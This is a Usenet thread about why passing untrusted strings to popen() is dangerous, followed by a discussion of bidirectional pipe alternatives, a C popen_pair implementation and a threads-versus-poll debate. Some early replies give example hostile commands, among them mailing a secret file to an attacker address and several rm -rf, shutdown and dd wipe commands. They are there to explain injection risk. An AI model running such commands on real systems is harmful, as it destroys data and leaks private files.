
Is popen() unsafe (with untrusted string) ?


Kenny McCormack

Jan 7, 2021, 2:20:00 PM
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).

Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).

(*) This would be like the |& functionality in gawk.

P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...

--
"They say if you play a Microsoft CD backwards, you hear satanic messages.
Thats nothing, cause if you play it forwards, it installs Windows."

Richard Kettlewell

Jan 7, 2021, 2:37:25 PM
gaz...@shell.xmission.com (Kenny McCormack) writes:
> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

mail atta...@example.com < /home/gazelle/some/secret/file
rm -rf /home/gazelle/*
echo set -e >> /home/gazelle/.profile
mail -s "I will kill you" someone.important@domain

--
https://www.greenend.org.uk/rjk/

Jim Jackson

Jan 7, 2021, 2:46:06 PM
On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

Sorry not much help here but ...

> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).

I vaguely remember reference to p2open, but it's not on my linux box.
Google gives some references to solaris, Sun's^H^H^H^H Oracle's "Unix".
As I did work on solaris boxes a long time ago, that's where I must have
remembered it from.

Stack overflow has some discussions e.g.

https://stackoverflow.com/questions/3884103/can-popen-make-bidirectional-pipes-like-pipe-fork

Barry Margolin

Jan 7, 2021, 3:20:23 PM
In article <rt7mss$182o5$1...@news.xmission.com>,
gaz...@shell.xmission.com (Kenny McCormack) wrote:

> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

It can be any command you could type at a terminal, and it's as
dangerous as you would be. So it can delete your files. If you're
permitted to run sudo, it could use that to execute commands as root (if
the perpetrator knows your password).

>
> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).
>
> (*) This would be like the |& functionality in gawk.
>
> P.S. This is more of a C question than anything else, but you know how
> they are in comp.lang.c...

Google "popen2". But beware, it's easy to get deadlocked with something
like this. Many programs use stdio, and output is fully buffered when
writing to a pipe. So you could send something to the program, it
processes it and sends the output, but you never get it because the
program hasn't flushed its output buffer.

--
Barry Margolin, bar...@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***

Kaz Kylheku

Jan 7, 2021, 3:28:21 PM
On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

For instance, let str = "rm -rf ~".

Popen runs arbitrary shell commands.

Executing a shell command from an untrusted source is exactly the same
thing as logging in remotely to the system via SSH using a public
terminal, and then walking away so that anyone else can use the session.

> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).

No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.

For instance you could define your own scripting language (some safe
subset of the shell, probably). In this sandboxed language, unsafe things are
somehow impossible to write (in what ways, to be decided by your design).

You write a compiler for this language whose output is the regular shell
language, and that output is fed to popen(), system(), or to
execl("/bin/sh", "/bin/sh", "-c", str, ...) etc.

Even if that compiler outputs code that uses unsafe features of the
shell language, they are not used in unsafe ways, because the
translation preserves the safe semantics of the sandboxed language.

That's exactly like how we can trust the machine language
output by a safe high level language, even though it uses the same
vocabulary of unsafe instructions as an assembly language program.

--
TXR Programming Language: http://nongnu.org/txr

Lew Pitcher

Jan 7, 2021, 3:29:55 PM
On Thu, 07 Jan 2021 19:19:56 +0000, Kenny McCormack wrote:

> If I use popen(str,"r") where str is supplied by an untrusted user, what
> can go wrong?

Pretty much anything from simple command failure to deletion of the
entire system. Consider the effects of
popen(str,"r")
when
str = "false";

Consider the effects when
str = "rm -rf .";
or
str = "shutdown -h now";
or
str = "dd if=/dev/zero of=/ bs=1M";

> Note: I'm not debating whether or not it is safe (I'm
> pretty sure of the answer),

So long as you are pretty sure that an unaudited input is completely
unsafe...

> but rather, I'm looking for an example of an
> unsafe string (I.e., something an attacker would do).

See above.

> Also, and this is related, is there a version of popen() (or some
> library or something available) that is bidirectional

Not as a single function, no

> - i.e., you can
> both write and read from it - for example, you could run the Unix 'sort'
> utility this way - send it some data, then read back the sorted result
> (*).

popen() is a wrapper around pipe(), fork() and exec(), and you can accomplish
bidirectionality by invoking those primitives directly with two pipes.

> (*) This would be like the |& functionality in gawk.
>
> P.S. This is more of a C question than anything else, but you know how
> they are in comp.lang.c...

HTH
--
Lew Pitcher
"In Skills, We Trust"

Kaz Kylheku

Jan 7, 2021, 3:49:05 PM
Here is a trivial example.

Suppose we write a validator for this language.

  expr -> expr '+' expr
        | expr '-' expr
        | expr '*' expr
        | expr '/' expr
        | number
        | ident
        | '(' expr ')'

  ident := [a-zA-Z][a-zA-Z0-9]*

  number := [-+]?[0-9]+

If we validate the string to conform to this language, then it looks
like "a + 3 / 4" and whatnot.

We reject strings that don't conform.

Then we can safely do this---almost!

snprintf(big_buffer, sizeof big_buffer, "echo $(( %s ))", str);

/* check for truncation */

FILE *pipe = popen(big_buffer, "r");

We have defined a safe arithmetic language that we can use the shell to
execute. It won't clobber anything in our host environment.

However, it provides unfettered access to environment variables.

Suppose that the environment has a sensitive, integer-valued environment
variable SECRET_ENV_VAR. The untrusted user can supply that name as the
expression and thereby learn the value of that variable.

Thus, suppose we take this idea further and define a more useful
language than just a calculator language. We have to guard against
leaking secrets from the environment.

One way would be namespacing. The variables in our language like ABC
or def would not translate into the same-named shell variables, but
into, say, sb_ABC and sb_def ("sb" == sandbox).

We could allow that language to have some environment manipulation.
For that we would provide some API. Only certain environment variables
would be loaded into sandboxed variables. For instance if we consider
TERM to be safe, we could pre-load sb_TERM with the value of TERM.
Likewise, we would have a carefully controlled "export" feature, which
only allows certain variables.

If ABC is an export-allowed variable, then the statement
"export ABC=42" in the sandboxed scripting language would
translate to "sb_ABC=42; export ABC=$sb_ABC". I.e. set the local
variable, and then also export the corresponding environment variable
which really has to be called ABC.

Our compiler would gather a list of all variables referenced by the
program, and then for that subset of those variables which are
"environment-allowed", it would emit an initial code block like:

sb_FOO=$FOO ; sb_BAR=$BAR ; ...

# BAZ is not on the whitelist so doesn't appear above

to fetch the value of all referenced whitelisted values from the
environment. Thus the language could access the env var $FOO and $BAR,
but $BAZ would appear uninitialized even if there is such an environment
variable.

Kenny McCormack

Jan 7, 2021, 4:18:33 PM
In article <202101071...@kylheku.com>,
Kaz Kylheku <563-36...@kylheku.com> wrote:
...
>> Also, and this is related, is there a version of popen() (or some library
>> or something available) that is bidirectional - i.e., you can both write
>> and read from it - for example, you could run the Unix 'sort' utility this
>> way - send it some data, then read back the sorted result (*).
>
>No. You have to "sandbox" the contents of "str" yourself before passing
>it to popen.

Just for clarity, these topics are related, but not in the way you think.

I.e., I wasn't implying that a bidirectional popen() would somehow make it
possible to pass arbitrary strings to popen() and have it magically become
safe.

Rather, my (unstated) point was that if I had a bidirectional popen(),
then I could pass data into the sub-process via stdin, rather than on the
command line. This would, in the context of my actual use case (still as
of yet unstated in this thread), solve the real life use case problem.

--
If the automobile had followed the same development cycle as the
computer, a Rolls-Royce today would cost $100, get a million miles to
the gallon, and explode once every few weeks, killing everyone inside.

Kaz Kylheku

Jan 7, 2021, 4:35:25 PM
On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> In article <202101071...@kylheku.com>,
> Kaz Kylheku <563-36...@kylheku.com> wrote:
> ...
>>> Also, and this is related, is there a version of popen() (or some library
>>> or something available) that is bidirectional - i.e., you can both write
>>> and read from it - for example, you could run the Unix 'sort' utility this
>>> way - send it some data, then read back the sorted result (*).
>>
>>No. You have to "sandbox" the contents of "str" yourself before passing
>>it to popen.
>
> Just for clarity, these topics are related, but not in the way you think.
>
> I.e., I wasn't implying that a bidirectional popen() would somehow make it
> possible to pass arbitrary strings to popen() and have it magically become
> safe.
>
> Rather, my (unstated) point was that if I had a bidirectional popen(),
> then I could pass data into the sub-process via stdin, rather than on the
> command line. This would, in the context of my actual use case (still as
> of yet unstated in this thread), solve the real life use case problem.

If the two approaches are viable alternatives, it means that you in fact
do not have a requirement to allow an untrusted user to execute
arbitrary program syntax that they specify.

Allowing a "canned" (therefore safely chosen by you) command to receive
input solves the problem of otherwise having to pass the input via
parameters (where they are treated as shell syntax).

If that is the situation, it's not too difficult to escape some data so
that it can be passed as arguments. Wrap it in single quotes, and replace
every embedded single quote with '\''.

Jorgen Grahn

Jan 7, 2021, 4:40:17 PM
I think questions about this /usually/ begin with an example like:

char buf[1000]; // never mind buffer overflows just now
sprintf(buf, "cat \"%s\"", str);
fd = popen(buf, "r");

Slightly more interesting that way.

/Jorgen

--
// Jorgen Grahn <grahn@ Oo o. . .
\X/ snipabacken.se> O o .

Janis Papanagnou

Jan 7, 2021, 8:33:22 PM
On 07.01.2021 20:19, Kenny McCormack wrote:
[ snip already answered popen() question ]
>
> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).
>
> (*) This would be like the |& functionality in gawk.

(or like '|&' in ksh)

> P.S. This is more of a C question than anything else, but you know how
> they are in comp.lang.c...

(Not sure you intended this as a "pure C" question but since you
posted in CUS and we can do such things in [some] shells...)

The '<>' redirection in shells allows read/write. With respect to
your sort statement we have to differentiate whether the command is
fully buffered [externally] (but then you could as well serialize
the command) or whether random changes should be possible in the
R/W-opened file. Ksh allows positioning ('seek'ing) in the opened
file with the specific redirection operators <#((N)) and >#((N)) .

Janis

Casper H.S. Dik

Jan 11, 2021, 11:36:50 AM
gaz...@shell.xmission.com (Kenny McCormack) writes:

>If I use popen(str,"r") where str is supplied by an untrusted user, what can
>go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
>sure of the answer), but rather, I'm looking for an example of an unsafe
>string (I.e., something an attacker would do).

It depends whether the application has additional privileges and/or the
user does not have access to a shell; e.g., the user is actually a web
application.

popen() can execute any command a user can through a shell.

>Also, and this is related, is there a version of popen() (or some library
>or something available) that is bidirectional - i.e., you can both write
>and read from it - for example, you could run the Unix 'sort' utility this
>way - send it some data, then read back the sorted result (*).

In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.


There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.

Casper

spudisno...@grumpysods.com

Jan 11, 2021, 12:00:13 PM
On 11 Jan 2021 16:36:37 GMT
Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
>gaz...@shell.xmission.com (Kenny McCormack) writes:
>>Also, and this is related, is there a version of popen() (or some library
>>or something available) that is bidirectional - i.e., you can both write
>>and read from it - for example, you could run the Unix 'sort' utility this
>>way - send it some data, then read back the sorted result (*).
>
>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>whether it is common.
>
>
>There is, of course, a risk: if you write to one end but you are not
>reading the other end at the same time, you might be blocked by the
>other program which is waiting for your to read but you are blocked
>trying to write more. Using threads would fix that.

Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.

Kenny McCormack

Jan 11, 2021, 8:35:15 PM
In article <5ffc7e95$0$300$e4fe...@news.xs4all.nl>,
Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
...
>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>whether it is common.

Yes, I read about p2open on Solaris (Oracle whatever they are calling it
now) and it looks quite useful. Any chance there is a publicly available
version of either it (specifically p2open()) or libgen in general for Linux?

--
Hindsight is (supposed to be) 2020.

Trumpers, don't make the same mistake twice.
Don't shoot yourself in the feet - and everywhere else - again!.

Rainer Weikusat

Jan 12, 2021, 12:53:21 PM
Something like this is much simpler with threads which can block
individually.

Nicolas George

Jan 12, 2021, 2:03:09 PM
Rainer Weikusat , dans le message
<878s8yy...@doppelsaurus.mobileactivedefense.com>, a écrit :
> Something like this is much simpler with threads which can block
> individually.

Until you need some kind of timeout or external interrupt. POSIX threads and
file descriptor I/O do not work well together, it's a common mistake.

Kaz Kylheku

Jan 12, 2021, 4:20:00 PM
["Followup-To:" header set to comp.unix.programmer.]
On 2021-01-12, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> In article <5ffc7e95$0$300$e4fe...@news.xs4all.nl>,
> Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
> ...
>>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>>whether it is common.
>
> Yes, I read about p2open on Solaris (Oracle whatever they are calling it
> now) and it looks quite useful. Any chance there is a publicly available
> version of either it (specifically p2open()) or libgen in general for Linux?

Here, I just made one.

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>

typedef struct FILE_pair {
  FILE *in, *out;
  pid_t pid;
} FILE_pair;

static const FILE_pair error_pair = { NULL, NULL, -1 };

FILE_pair popen_pair(const char *command)
{
  int in_pipe[2] = { -1, -1 }; /* from parent point of view */
  int out_pipe[2] = { -1, -1 };
  pid_t child = -1;

  if (pipe(in_pipe) == 0 && pipe(out_pipe) == 0 && (child = fork()) != -1) {
    if (child != 0) {
      FILE_pair fp;

      /* parent: drop the child's ends so that EOF can propagate */
      close(in_pipe[1]);
      close(out_pipe[0]);
      in_pipe[1] = out_pipe[0] = -1;

      fp.in = fdopen(in_pipe[0], "r");
      fp.out = fdopen(out_pipe[1], "w");
      fp.pid = child;

      if (fp.in && fp.out) {
        /* make output line buffered so we don't have to fflush
         * all the time
         */
        setvbuf(fp.out, NULL, _IOLBF, 0);
        return fp;
      }

      /* fclose also closes the descriptor; don't close it again below */
      if (fp.in) {
        fclose(fp.in);
        in_pipe[0] = -1;
      }

      if (fp.out) {
        fclose(fp.out);
        out_pipe[1] = -1;
      }
    } else {
      /* read end of parent's output pipe is child's input */
      dup2(out_pipe[0], STDIN_FILENO);
      /* write end of parent's input pipe is child's output */
      dup2(in_pipe[1], STDOUT_FILENO);

      /* close the originals; otherwise the child keeps the write end
       * of its own stdin open and never sees EOF
       */
      close(in_pipe[0]);
      close(in_pipe[1]);
      close(out_pipe[0]);
      close(out_pipe[1]);

      execl("/bin/sh", "/bin/sh", "-c", command, (char *) NULL);
      _exit(127);
    }
  }

  if (child > 0) {
    kill(child, SIGKILL);
    waitpid(child, NULL, 0); /* reap it */
  }
  /* entries already closed are -1 here, and close(-1) fails harmlessly */
  close(in_pipe[0]);
  close(in_pipe[1]);
  close(out_pipe[0]);
  close(out_pipe[1]);
  return error_pair;
}

int pclose_pair(FILE_pair fp)
{
  int wstatus, result = -1;
  fclose(fp.out);

  if (waitpid(fp.pid, &wstatus, 0) != -1) {
    if (WIFEXITED(wstatus))
      result = WEXITSTATUS(wstatus);
  }
  fclose(fp.in);
  return result;
}

int main(void)
{
  FILE_pair fp = popen_pair("read foo; printf '%s\\n' $foo");
  char buf[72]; // For posting this program to Usenet

  if (fp.out != NULL) {
    fputs("hello\n", fp.out);

    if (fgets(buf, sizeof buf, fp.in))
      fputs(buf, stdout);

    printf("pipe exit status = %d\n", pclose_pair(fp));
    return 0;
  }

  return EXIT_FAILURE;
}

spudisno...@grumpysods.com

Jan 13, 2021, 4:15:17 AM
It really isn't. But if you only know how to use a hammer...

IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.

jo...@schily.net

Jan 13, 2021, 7:05:11 AM
In article <slrnrvep...@iridium.wf32df>,
Jim Jackson <j...@franjam.org.uk> wrote:
>On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:

>> Also, and this is related, is there a version of popen() (or some library
>> or something available) that is bidirectional - i.e., you can both write
>> and read from it - for example, you could run the Unix 'sort' utility this
>> way - send it some data, then read back the sorted result (*).
>
>I vaguely remember reference to p2open, but it's not on my linux box.
>Google gives some references to solaris, Sun's^H^H^H^H Oracle's "Unix".

The idea is not from Solaris, but from AT&T and thus supported by all platforms
that implement SVr4 compatibility. The function is in libgen, see e.g.:

https://sourceforge.net/p/schillix-on/schillix-on/ci/default/tree/usr/src/lib/libgen/common/

>As I did work on solaris boxes a long time ago, that's where I must have
>remembered it from.
>
>Stack overflow has some discussions e.g.
>
>https://stackoverflow.com/questions/3884103/can-popen-make-bidirectional-pipes-like-pipe-fork

This is however only related to the pipe issue, but not to the primary
"untrusted string" question from the OP that is related to security issues.
The reason for the security problem of functions similar to popen() is that,
like system(), they run the command through the shell, which may be a problem,
e.g. with nasty shell environment variables.

In 2008, I wrote a gnome library for high quality CD audio extraction based on
cdda2wav. This needs pipes to stdin/stdout/stderr at the same time and since
cdda2wav is a privileged program, I did not use system() but rather
vfork()/execl().

If you are interested in this implementation, I recommend you to have a look at
recent SCCS sources. The function is called xpopen() and if you fetch the
recent SCCS sources with "schilytools", you should have a look at:

sccs/sccs/lib/mpwlib/src/xpopen.c

See http://sourceforge.net/projects/schilytools/files/ for the download
location.

--
EMail:jo...@schily.net Jörg Schilling D-13353 Berlin
Blog: http://schily.blogspot.com/
URL: http://cdrecord.org/private/ http://sourceforge.net/projects/schilytools/files/

Nicolas George

Jan 13, 2021, 7:38:03 AM
spudisno...@grumpysods.com, dans le message
<rtmdmv$1o6p$1...@gioia.aioe.org>, a écrit :
> It really isn't. But if you only know how to use a hammer...
>
> IMO threads should be avoided unless absolutely necessary as the downsides
> generally outweigh the upsides but we have a generation of devs brought up
> on Windows where threads are the go-to way to do in program multitasking due
> to the limitations of that OS and its API.

Hear, hear.

POSIX threads are good for high performance. If you have a CPU-intensive
computation that can be parallelized, then use threads.

If you want to handle many network connections as fast as possible, then use
threads too. But not one thread per connection, one thread per processor,
and a poll()-like loop in each.

spudisno...@grumpysods.com

Jan 13, 2021, 9:45:47 AM
On 13 Jan 2021 12:38:00 GMT
For absolute speed yes, threads are a solution. But I had an argument with
a project manager a few years ago about wanting to use multiprocess for a
mid load network server - select() -> fork() -> accept() etc - because it was
a bet the company system and we simply could not afford to have a bug in one
network session bring down the entire system. I won in the end, after
explaining to him what fork() and copy-on-write did since he'd never
developed on *nix in his life.


Scott Lurndal

Jan 13, 2021, 11:12:35 AM
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.

There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.

Rainer Weikusat

Jan 13, 2021, 11:35:46 AM
spudisno...@grumpysods.com writes:
> On Tue, 12 Jan 2021 17:53:09 +0000
> Rainer Weikusat <rwei...@talktalk.net> wrote:
>>spudisno...@grumpysods.com writes:
>>> On 11 Jan 2021 16:36:37 GMT
>>> Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
>>>>gaz...@shell.xmission.com (Kenny McCormack) writes:
>>>>>Also, and this is related, is there a version of popen() (or some library
>>>>>or something available) that is bidirectional - i.e., you can both write
>>>>>and read from it - for example, you could run the Unix 'sort' utility this
>>>>>way - send it some data, then read back the sorted result (*).
>>>>
>>>>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>>>>whether it is common.
>>>>
>>>>
>>>>There is, of course, a risk: if you write to one end but you are not
>>>>reading the other end at the same time, you might be blocked by the
>>>>other program which is waiting for your to read but you are blocked
>>>>trying to write more. Using threads would fix that.
>>>
>>> Or alternatively you could be sensible and use select/poll multiplexing on
>>> the descriptor returned from fileno() instead of messing around with
>>threading
>>> and all the nonsense that goes with it.
>>
>>Something like this is much simpler with threads which can block
>>individually.
>
> It really isn't. But if you only know how to use a hammer...

It is and your assumption about me is wrong: I've implemented both in
the past and have written a lot more code structured around synchronous
I/O multiplexing loops than multithreaded code.

For the given case, "feeding input to the secondary program" can be
implemented with a thread (or a forked process, obviously) which doesn't
need to interact with anything else in the program. It just writes to
the file descriptor and will be blocked by the kernel as necessary.

Another thread just reads whatever data becomes available and processes
it.

For instance, there's absolutely no need for any kind of fancy buffer
management, especially for partial writes, in this case.

Nicolas George

Jan 13, 2021, 1:23:14 PM
Scott Lurndal, dans le message <OZELH.2391$ew6...@fx11.iad>, a écrit :
> Can you elaborate on this rather odd statement? POSIX threads and
> file descriptor (or even stdio) I/O interfaces work just fine together.

Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?

> There's always the poll and select family of system calls to provide
> timeouts; I use poll extensively in threaded networking code.

That's exactly what I mean: you have threads, and you still need to use I/O
multiplexing.

Scott Lurndal

Jan 13, 2021, 2:24:15 PM
No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).

For socket endpoints, I'll create a pipe(2) to use to notify the thread to exit and
the thread main loop will poll the pipe and the socket fd. The main code
will write a single byte to the pipe to terminate the poll, and the
thread will exit.

One can certainly set up one or more threads to just do synchronous I/O on demand using a request
and completion queue (similar to most modern host controller hardware)
without using poll or select.

Kaz Kylheku

Jan 13, 2021, 2:51:22 PM
On 2021-01-13, Nicolas George <nicolas$geo...@salle-s.org> wrote:
> Scott Lurndal, dans le message <OZELH.2391$ew6...@fx11.iad>, a écrit :
>> Can you elaborate on this rather odd statement? POSIX threads and
>> file descriptor (or even stdio) I/O interfaces work just fine together.

I understand this as meaning that "to use threads with I/O effectively, we need
to use multiplexing mechanisms that are also usable by single-threaded programs
that don't know anything about threads".

I.e. threads (or at least POSIX threads) do not succeed in replacing mechanisms
for multiplexing events onto one thread such as timeouts, select/poll, async
I/O and whatever.


> Oh? Then please tell me: how do you multiplex a mutex or condition wait with
> a socket accept?

Yes, that can be a problem. I needed to do this in the kernel once,
and wrote it!

In the lmc-2.0 archive given here

http://www.kylheku.com/~kaz/lmc.html

See this function (in mutex.c):

/**
 * Atomically give up the mutex and wait on the condition variable.
 * Wake up if the specified timeout elapses, or if a signal is delivered.
 * Additionally, also wait on the specified file descriptors to become
 * ready, combining condition waiting with poll().
 * KCOND_WAIT_SUCCESS means the condition was signaled, or one or more
 * file descriptors are ready.
 * Also, a negative value can be returned indicating an error!
 * (The poll needs to dynamically allocate some memory for the wait table).
 * The timeout is relative to the current time, specifying how long to sleep in
 * jiffies (CPU clock ticks).
 */
int kcond_timed_wait_rel_poll(kcond_t *, kmutex_t *, long,
                              kcond_poll_t *, unsigned int);

Nicolas George

Jan 13, 2021, 3:18:41 PM
Scott Lurndal, dans le message <uNHLH.22369$Ad1....@fx33.iad>, a
écrit :
> No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).

Wow, that was a waste of time.

> For socket endpoints, I'll create a pipe(2) to use to notify the thread to
> exit and the thread main loop will poll the pipe and the socket fd. The
> main code will write a single byte to the pipe to terminate the poll, and
> the thread will exit.

So you know how to force threads to work with file descriptors despite the
fact they're not designed for it. Good for you.

Philip Guenther

Jan 14, 2021, 11:13:58 PM
On Thursday, January 7, 2021 at 11:20:00 AM UTC-8, Kenny McCormack wrote:
...
> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).

One classic (i.e., "decades old") and portable inside POSIX technique that solves a large subset of this problem space is to use a process sandwich, where you create two pipes, then fork twice with one child execing the target utility after some fd swizzling, with the other child serving as the writer/source and the original process being the reader/sink**. This simplifies things whenever the writer and reader operations are not so tightly coupled as to need to share state, the key idea being that running the writer and reader in separate processes eliminates the deadlock issues.

(I suppose this can be 'simplified' by only doing one pipe and fork for the writer, then using popen() for the utility, but that requires more fd swizzling to set up the stdio for the popen() and then revert it afterwards, but I've never seen this idiom written that way.)


This obviously doesn't work when the writer and reader share state. For example, if the process needs to run some non-trivial protocol over a TCP connection (like HTTP, or TLS) to receive the input and send back the output, possibly interleaved, then some way to share the necessary state across the fork would be necessary, which would probably be more complicated than just doing I/O multiplexing with poll() in one process.


Philip Guenther

** or the other way around, with the original process being the writer. The cases I've seen this used have all had the full input available from the start and wanted to carry on processing with the output, so making the writer the child was correct for them.

Kaz Kylheku

Jan 15, 2021, 3:24:14 AM
On 2021-01-15, Philip Guenther <guen...@gmail.com> wrote:
> On Thursday, January 7, 2021 at 11:20:00 AM UTC-8, Kenny McCormack wrote:
> ...
>> Also, and this is related, is there a version of popen() (or some library
>> or something available) that is bidirectional - i.e., you can both write
>> and read from it - for example, you could run the Unix 'sort' utility this
>> way - send it some data, then read back the sorted result (*).
>
> One classic (i.e., "decades old") and portable inside POSIX technique
> that solves a large subset of this problem space is to use a process
> sandwich, where you create two pipes, then fork twice with one child
> execing the target utility after some fd swizzling, with the other
> child serving as the writer/source and the original process being the
> reader/sink**.

E.g.

VAR=$(function | sort)

function runs in child process, sort in another, and the original
process captures the output, storing it in VAR.

Rainer Weikusat

Jan 18, 2021, 12:53:21 PM
For illustration: Main 'working function' for a program relaying data to
and from an AF_UNIX stream socket:

static void forward_data(int from, int to)
{
    char buf[1024];
    ssize_t rc_r, rc_w;

    while (rc_r = read(from, buf, sizeof(buf)), rc_r > 0) {
        rc_w = write(to, buf, rc_r);
        rc_w != -1 || sys_die("write");
    }

    rc_r != -1 || sys_die("read");
}

This runs twice, from a 2nd thread and from main, and that's all of the
program.